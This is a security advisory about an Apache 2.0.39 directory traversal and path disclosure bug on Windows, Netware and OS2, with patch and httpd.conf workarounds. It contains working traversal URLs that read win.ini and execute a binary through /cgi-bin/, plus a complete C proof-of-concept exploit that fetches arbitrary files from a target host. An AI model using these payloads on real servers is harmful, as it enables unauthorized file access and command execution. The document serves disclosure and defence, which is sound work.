COMMAND

    Apache directory traversal and path disclosure bug

SYSTEMS AFFECTED

    Apache version 2.0.39 and previous 2.0.x, ONLY on systems that
    support backslash path delimiters (Win/Netware/OS2 etc...)

PROBLEM

    Auriemma Luigi [aluigi@pivx.com], Security Researcher, PivX Solutions
    [http://www.PivX.com], LLC posted :

    1) Introduction

    The bug I have found about the directory traversal can be classified
    as a high risk bug and the path disclosure as a low risk. With the
    first bug an attacker can see every file in the system and execute it
    using the /cgi-bin/ path. The bug was shown to the Apache Group some
    minutes after it was discovered. The bug was quickly fixed. The second
    bug instead is a simple path disclosure bug, useful for obtaining more
    info about the server (important if the administrator hides some
    information).

    - IMPORTANT NOTE -

    The ASF recommends all Win32, Netware and OS2 users immediately upgrade
    to 2.0.40 or, temporarily, apply the fix suggested in the Fix section
    of this advisory. It is also suggested that any of the un*x-flavors
    also should consider upgrading to 2.0.40 to eliminate the
    path-revealing bugs that apply to all versions.

    2) Bug

    A) CAN-2002-0654
    ----------------

    The bug is not dangerous because it does not give remote access to the
    system or other data accesses, but for an attacker it is useful in
    gathering detailed information about the server to launch other
    malicious attacks. With this bug we can see the path where Apache is
    installed, so we can know if the server runs on a Windows machine, if
    it is the second version of Apache (Apache2) and naturally the server
    version (all of the info is useful if the administrator has obscured
    the Server field or other info about the server, so if the bug is
    present, we know for example that the Apache installed is a version
    prior to 2.0.40). However, let's go on with the example.
    From the browser we must insert the following string:

        http://127.0.0.1/error/HTTP_NOT_FOUND.html.var

    Then the server will answer with this page:

        Not Acceptable

        An appropriate representation of the requested resource
        /error/HTTP_NOT_FOUND.html.var could not be found on this server.
        Available variants:

          * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
          * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
          * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es
          * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr

    As we can see, the server answers with the full path of the file we
    have requested. We can request all the .var files in the error folder
    and we will have the same result. More detailed info can be found on
    the Apache website http://httpd.apache.org

    B) CAN-2002-0661
    ----------------

    The problem is in the management of the bad chars that can be used to
    launch some attacks, such as the directory traversal. In fact the
    backslash char ('\' == %5c) is not checked as a bad char, so it can be
    used for seeking the directories of systems that use it as a path
    delimiter (Windows, Netware, OS2 and others). Then another problem is
    that the attacker can execute commands on the remote host simply using
    the /cgi-bin/ path. The following are two simple examples.

    To view the file winnt\win.ini:

        http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

    To run the wintty utility in the Apache2/bin folder:

        http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO

    In human readable form, they mean:

        http://127.0.0.1/error/\..\..\..\..\winnt\win.ini
        http://127.0.0.1/cgi-bin/\..\bin\wintty.exe?-t+HELLO

    So in the first example we go down to the root path with \..\..\..\..
    because we are in "c:\program files\Apache Group\Apache2\error".
    Instead in the second example we use the /cgi-bin/ path and we pass
    arguments with "file.exe?arg1+arg2+arg3+...".

    3) The Code

    Look at the examples in section 2.

    Update (29 August 2002)
    =======================

    /*
     * DSR-apache2.0x by bob@dtors.net
     * Exploit found by Auriemma Luigi.
     *
     * This is Proof of Concept exploit for
     * the current directory traversal design flaw
     * in apache 2.0.x - 2.0.39.
     *
     * Affected Systems:
     *
     * Windows [win32]
     * Netware
     * OS2
     * Cygwin
     *
     * This exploit allows the attacker to view ANY
     * file on the target machine if it is vulnerable
     * to this attack.
     *
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/select.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define bs "%5c"

    /* "%5c%2e%2e" five times, then a closing "%5c": \..\..\..\..\..\ */
    char travcode[]=
        "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
        "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
        "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
        "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
        "\x25\x35\x63\x25\x32\x65\x25\x32\x65"
        "\x25\x35\x63";

    /* Relay whatever the server sends to stdout until it hangs up. */
    void reply(int sock)
    {
        int n;
        char recvbuf[1024];
        fd_set rset;

        while (1) {
            FD_ZERO(&rset);
            FD_SET(sock,&rset);
            FD_SET(STDIN_FILENO,&rset);
            select(sock+1,&rset,NULL,NULL,NULL);

            if (FD_ISSET(sock,&rset)) {
                /* read one byte less than the buffer so the NUL fits */
                if((n=read(sock,recvbuf,sizeof(recvbuf)-1)) <= 0) {
                    printf("Connection closed by foreign ghost.\n");
                    exit(0);
                }
                recvbuf[n]=0;
                printf("%s",recvbuf);
            }
            if (FD_ISSET(STDIN_FILENO,&rset)) {
                if((n=read(STDIN_FILENO,recvbuf,sizeof(recvbuf)-1)) > 0) {
                    recvbuf[n]=0;
                    //write(sock,recvbuf,n);
                }
            }
        }
    }

    int main(int argc, char *argv[])
    {
        int sock;
        char exp[1024];
        struct sockaddr_in sin;
        struct hostent *he;

        fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n");
        fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
        fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

        if(argc<4) {
            fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
            exit(1);
        }
        if ((he=gethostbyname(argv[1])) == NULL) {
            fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
            exit(1);
        }

        /* A fresh pair of clean socks ;) */
        sock=socket(AF_INET, SOCK_STREAM, 0);
        memset(&sin, 0, sizeof(sin));
        memcpy(&sin.sin_addr, he->h_addr, he->h_length);
        sin.sin_family=AF_INET;
        sin.sin_port=htons(80);

        /* yummy fresh smelling */
        fprintf(stdout, "Hold up bish connecting to host... \n");
        if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) {
            fprintf(stderr, "My socks are all sweaty.\n");
            exit(1);
        }

        /* im exhausted after that...gn */
        sleep(3);
        /* GET /error/\..\..\..\..\..\<dir>\<file>: the 'error' Alias lands
           inside the Apache2 tree and the backslashes walk back out of it */
        snprintf(exp, sizeof(exp),
                 "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n",
                 travcode, argv[2], bs, argv[3], argv[1]);
        write(sock,exp,strlen(exp));
        fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
        reply(sock);
        close(sock);
        exit(0);
    }

SOLUTION

    Patch
    =====

    Apache 2.0.40 from Apache website (http://httpd.apache.org)

    Workaround
    ==========

    However this is a simple workaround suggested by the Apache Group for
    the directory traversal bug:

    A simple one line workaround in the httpd.conf file will disallow the
    vulnerability. Prior to the first 'Alias' or 'Redirect' directive, add
    the following directive to the global server configuration:

        RedirectMatch 400 "\\.."

    -Also-

    William A. Rowe, Jr. comments :

    In Auriemma's first example, a normal 'Alias' is used to bypass the
    document root (the alias to the error docs location), and in the second
    case the 'ScriptAlias' is used, which also forces the cgi-script
    handler. In a properly secured server, the following will prevent the
    examples above;

        <Directory />
            Options FollowSymLinks
            AllowOverride None
            Order deny,allow
            Deny from all
        </Directory>

    This protection will refuse to serve any directories that are not
    explicitly permitted by their own overriding <Directory > blocks. Of
    course, all <Directory > blocks containing web content will require the
    following lines (or similar) to permit access as desired...
        Order allow,deny
        Allow from all

    However, ScriptAlias circumvents the Options ExecCGI, so the following
    would still work in the usual configuration;

        http://127.0.0.1/cgi-bin/%5c%2e%2e%5chtdocs%5cindex.html.en

    which invokes htdocs\index.html.en as a script. Not useful, certainly,
    but other more sinister purposes could be invented. As a further safety
    precaution, use the Alias directive in lieu of the ScriptAlias
    directive. The following structure will close the third example
    vulnerability;

        Alias /cgi-bin/ "/Path-to-Apache2/cgi-bin/"
        <Directory "/Path-to-Apache2/cgi-bin/">
            AllowOverride None
            Options ExecCGI
            Order allow,deny
            Allow from all
            SetHandler cgi-script
        </Directory>

    which only enables script execution in the given directory, and not as
    a consequence of ScriptAlias translation. Finally, it may be desirable
    not to use the SetHandler directive, but instead call out each and
    every AddHandler cgi-script pl cgi ... and all other permitted cgi
    files or file types.

    A more complete report will be prepared and distributed by the Apache
    HTTP project. Follow the project's guidance for all Win32, OS2, Netware
    and Cygwin Apache 2.0.x servers (prior to .40), and add the:

        RedirectMatch 400 "\\.."

    escape in the global server context (right after the global
    DocumentRoot directive would be the safest place to assure it is the
    first evaluated RedirectMatch directive.) Then upgrade to Apache 2.0.40
    on any of those platforms.
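    The pieces of the SOLUTION section depend on their order in
    httpd.conf, so here they are assembled into one fragment. This is an
    added example, not text from the advisory, the Apache Group or Rowe.
    "/Path-to-Apache2" is the placeholder the advisory itself uses; the
    htdocs <Directory> block is assumed as the "web content" block that
    Rowe says every content directory needs.

```apache
# Added example: the advisory's workarounds in the order they must appear.

# 1. Global context, before the first Alias/ScriptAlias/Redirect: refuse
#    any decoded URI containing a backslash followed by two characters
#    (what %5c%2e%2e becomes).  The doubled backslash matters: "\.." is
#    a literal dot and would match, and break, almost every request.
RedirectMatch 400 "\\.."

# 2. Deny everything by default; each content directory opts in.
<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

# Assumed content directory (placeholder path as in the advisory).
<Directory "/Path-to-Apache2/htdocs">
    Order allow,deny
    Allow from all
</Directory>

# 3. Alias instead of ScriptAlias, so cgi-script is enabled by this
#    <Directory> block and not by the alias translation itself.
Alias /cgi-bin/ "/Path-to-Apache2/cgi-bin/"
<Directory "/Path-to-Apache2/cgi-bin/">
    AllowOverride None
    Options ExecCGI
    Order allow,deny
    Allow from all
    SetHandler cgi-script
</Directory>
```

    The RedirectMatch line is the only part that addresses the traversal
    directly; the <Directory> blocks limit what a request that slips past
    it can reach. Neither replaces the upgrade to 2.0.40.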
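    The two requests in section 2B and the RedirectMatch workaround can be
    modelled in a few lines of C. What follows is an added example written
    for this page; it is not code from the advisory, from Auriemma, from
    dtors.net or from the Apache project. It assumes, as a simplification,
    that the server decodes %XX escapes once, splits the path into
    segments and counts ".." steps relative to the aliased directory; the
    names climbs_out, rejects_backslash, url_decode and MAXPATH and the
    alias-prefix handling are this example's own. The point it makes is
    that the same decoded name is a single segment when only '/' is a
    separator but "..\..\..\.." when the file system also honours '\', and
    that the RedirectMatch 400 "\\.." predicate closes the gap by refusing
    the decoded backslash before any alias is applied.

```c
/*
 * Added example for this page (not code from the advisory, Auriemma,
 * dtors.net or Apache).  climbs_out(), rejects_backslash(), url_decode()
 * and the alias-prefix/depth model are this example's own simplification.
 *   backslash_is_sep == 0  the check the vulnerable server effectively
 *                          made: only '/' ends a path segment
 *   backslash_is_sep == 1  what the Win32/Netware/OS2 file system does
 *                          with the same name: '\' is a separator too
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXPATH 1024

/* Decode %XX escapes once, as the server does before alias matching.
 * Returns 0 on a malformed or over-long input. */
static int url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        if (o + 1 >= outlen)
            return 0;
        if (*in == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return 0;
            char hex[3] = { in[1], in[2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            in += 2;
        } else {
            out[o++] = *in;
        }
    }
    out[o] = '\0';
    return 1;
}

static int is_sep(char c, int backslash_is_sep)
{
    return c == '/' || (backslash_is_sep && c == '\\');
}

/* Does the part of uri after alias_prefix climb above the aliased
 * directory?  1 = yes (or malformed request), 0 = stays inside,
 * -1 = prefix does not match. */
int climbs_out(const char *uri, const char *alias_prefix, int backslash_is_sep)
{
    char dec[MAXPATH];
    if (!url_decode(uri, dec, sizeof dec))
        return 1;
    size_t plen = strlen(alias_prefix);
    if (strncmp(dec, alias_prefix, plen) != 0)
        return -1;

    int depth = 0;                    /* 0 == the aliased directory itself */
    const char *p = dec + plen;
    while (*p != '\0') {
        while (is_sep(*p, backslash_is_sep))
            p++;
        if (*p == '\0')
            break;
        const char *seg = p;
        while (*p != '\0' && !is_sep(*p, backslash_is_sep))
            p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.')
            continue;                 /* "." changes nothing */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (depth == 0)
                return 1;             /* ".." with nowhere to go but up */
            depth--;
        } else {
            depth++;
        }
    }
    return 0;
}

/* The advisory's workaround, RedirectMatch 400 "\\..", refuses a decoded
 * URI containing a backslash followed by any two characters; same predicate. */
int rejects_backslash(const char *uri)
{
    char dec[MAXPATH];
    if (!url_decode(uri, dec, sizeof dec))
        return 1;
    const char *bsl = strchr(dec, '\\');
    return bsl != NULL && bsl[1] != '\0' && bsl[2] != '\0';
}

int main(void)
{
    /* The two requests from section 2B of the advisory. */
    static const struct { const char *uri, *prefix; } req[] = {
        { "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini", "/error/" },
        { "/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe", "/cgi-bin/" },
    };
    for (size_t i = 0; i < sizeof req / sizeof req[0]; i++)
        printf("%s\n  '/' only: %s\n  '/' and '\\': %s\n  RedirectMatch 400: %s\n",
               req[i].uri,
               climbs_out(req[i].uri, req[i].prefix, 0) ? "climbs out" : "stays inside",
               climbs_out(req[i].uri, req[i].prefix, 1) ? "climbs out" : "stays inside",
               rejects_backslash(req[i].uri) ? "rejected" : "passed");
    return 0;
}
```

    Compile with cc -Wall and run without arguments: for each of the two
    URIs it prints "stays inside" for the '/'-only check, "climbs out" for
    the check that also honours '\', and "rejected" for the RedirectMatch
    predicate. The prefix handling is a deliberate simplification of
    Alias/ScriptAlias translation; Apache itself collapses forward-slash
    "../" segments before the alias match, which is exactly why only the
    backslash form got through.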